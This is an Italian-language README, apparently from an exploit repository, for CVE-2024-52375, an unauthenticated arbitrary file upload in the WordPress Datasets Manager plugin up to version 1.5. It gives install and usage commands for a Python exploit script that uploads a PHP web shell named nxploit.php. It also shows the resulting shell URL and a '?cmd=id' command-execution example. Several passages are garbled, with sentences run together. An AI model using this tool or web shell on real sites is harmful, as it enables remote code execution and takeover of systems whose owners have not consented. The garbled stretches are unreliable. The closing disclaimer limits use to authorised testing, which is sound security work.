
WordPress Datasets Manager di Arttia Creative plugin <= 1.5 - Vulnerabilità di caricamento file arbitrario
💥 Exploit di: Nxploit (Khaled Alenazi)
📅 CVE Pubblicato: 14 Novembre 2024
🧠 Punteggio CVSS: 10.0 (Critico)
🛠 CWE-434: Caricamento senza restrizioni di file con tipo pericoloso
È stata scoperta una vulnerabilità critica nel plugin WordPress Datasets Manager by Arttia Creative, che colpisce tutte le versioni fino alla 1.5 inclusa.
Il plugin non riesce a convalidare correttamente i tipi di file durante il processo di caricamento, consentendo a un attaccante non autenticato di caricare file arbitrari — inclusi shell PHP — e ottenere Esecuzione di Codice Remoto (RCE).
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:Hrequests:
pip install requests
usage: CVE-2024-52375.py [-h] -u URL
Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Full target URL (e.g. http://target.com/wordpress)
Sostituisci l'URL con il percorso completo dell'installazione WordPress di destinazione.
Se ha successo, lo script:
_wpnonce pubblico dal frontend.nxploit.php.[+] Shell available at:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php
Puoi quindi eseguire comandi come:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id
readme.txt.<= 1.5 sono vulnerabili.Questo strumento è fornito esclusivamente per scopi educativi e di test autorizzati.
Usarlo contro sistemi di cui non si è proprietari o per cui non si ha il permesso di testare è illegale.